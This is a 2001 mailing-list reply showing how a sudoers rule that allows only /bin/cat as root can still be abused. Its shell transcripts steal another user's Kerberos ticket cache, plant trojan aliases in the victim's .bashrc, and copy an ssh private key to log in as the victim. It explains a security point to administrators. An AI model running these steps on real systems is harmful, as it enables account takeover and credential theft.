On Sat, Jul 07, 2001 at 02:10:09AM +0100, Eric E Moore wrote:
> I would be very shocked if you could compromise a system with a
> sudoers entry of:
> me hostname = (root) /bin/cat
Depends on what's on the system. I've thought of four similar ways.
With Kerberos, you can steal someone's ticket-granting ticket and use it
until it expires. My example also uses AFS:
| test@pentagram:~$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: [EMAIL PROTECTED]
| Valid starting Expires Service principal
| 07/06/01 22:29:11 07/07/01 08:29:11 [EMAIL PROTECTED]
| 07/06/01 22:29:11 07/07/01 08:29:11 [EMAIL PROTECTED]
| 07/06/01 22:29:11 07/07/01 08:29:11 [EMAIL PROTECTED]
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| test@pentagram:~$ cd /tmp
| test@pentagram:/tmp$ ls -al
| total 20
| drwxrwxrwt 3 root root 1024 Jul 6 22:29 .
| drwxr-xr-x 21 root root 1024 Jun 27 23:41 ..
| -rw------- 1 waoki waoki 892 Jul 6 01:40 krb5cc_1002
| -rw------- 1 waoki waoki 848 Jul 6 22:22 krb5cc_GMJQN9
| -rw------- 1 test test 885 Jul 6 22:28 krb5cc_SyJR0W
| -rw------- 1 test test 885 Jul 6 22:26 krb5cc_YzLI0R
| -rw------- 1 test test 1243 Jul 6 22:29 krb5cc_q5bOCp
| drwxr-xr-x 2 root root 12288 Nov 14 2000 lost+found
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| ls: /afs/g6net.com/user/waoki/secure: Permission denied
| test@pentagram:/afs/g6net.com/user/waoki$ touch /afs/g6net.com/user/waoki/afile
| touch: creating `/afs/g6net.com/user/waoki/afile': Permission denied
Nope, can't access someone else's homedir...
| test@pentagram:/tmp$ sudo -v
| We trust you have received the usual lecture from the local System
| Administrator. It usually boils down to these two things:
| #1) Respect the privacy of others.
| #2) Think before you type.
| Password for [EMAIL PROTECTED]:
Now we steal a TGT (but we could also go after the keytab)...
| test@pentagram:/tmp$ sudo /bin/cat krb5cc_GMJQN9 > krb5cc_q5bOCp
| test@pentagram:/tmp$ aklog
...and now I'm someone else!
| test@pentagram:/tmp$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: [EMAIL PROTECTED]
| Valid starting Expires Service principal
| 07/06/01 22:21:56 07/07/01 08:21:52 [EMAIL PROTECTED]
| 07/06/01 22:22:03 07/07/01 08:21:52 [EMAIL PROTECTED]
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| total 4
| drwxr-xr-x 2 waoki waoki 2048 Jul 6 01:39 .
| drwxr-xr-x 5 waoki waoki 2048 Jul 6 22:33 ..
| -rw-r--r-- 1 waoki waoki 0 Jul 6 01:39 file
(As an aside, although the 'secure' directory above is mode 755, it's
on AFS, so the Unix mode bits don't apply.)
Now let's set up some trojans:
| test@pentagram:/tmp$ cp ~/.su.trojan ~/.sudo.trojan ~/.kadmin.trojan
| test@pentagram:/tmp$ echo alias su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /bin/su=~/.su.trojan >>
| test@pentagram:/tmp$ echo alias sudo=~/.sudo.trojan >>
| test@pentagram:/tmp$ echo alias /usr/bin/sudo=~/.sudo.trojan >>
| test@pentagram:/tmp$ echo alias kadmin=~/.kadmin.trojan >>
| test@pentagram:/tmp$ echo alias /usr/sbin/kadmin=~/.kadmin.trojan >>
| test@pentagram:/tmp$
Something similar could be done if someone's ssh identity or id_dsa keys
aren't password protected:
| [test@tertia test]$ sudo cat /home/waoki/.ssh/id_dsa > .ssh/id_dsa
| [test@tertia test]$ ssh localhost -l waoki
and now I can trojan apps, or (since the default Debian sudo uses one
timestamp file per user, instead of one per user per tty) I can wait
for the victim to sudo, and then sudo without entering his password.
3 and 4:
If the system's running Samba, access to /etc/smbpasswd lets me log in
to Samba as anyone who appears in /etc/smbpasswd. If the system is using
Netatalk with randnum authentication, users' AppleTalk passwords will
be stored in plaintext in ~/.passwd. Once again, I can trojan binaries
and scripts.
Oh, and catting /proc/kcore could yield interesting information.
William Aoki [EMAIL PROTECTED] (801)-(58)5-1924
UMNH Computer Support Room 001, GTB (801)-(58)1-6928
1390 E President's Circle Salt Lake City, Utah 84112-0050
Key 199D8C7B Fingerprint 3B0A 6800 8A1A 78A7 9A26 BB92 6329 2D3E 199D 8C7B
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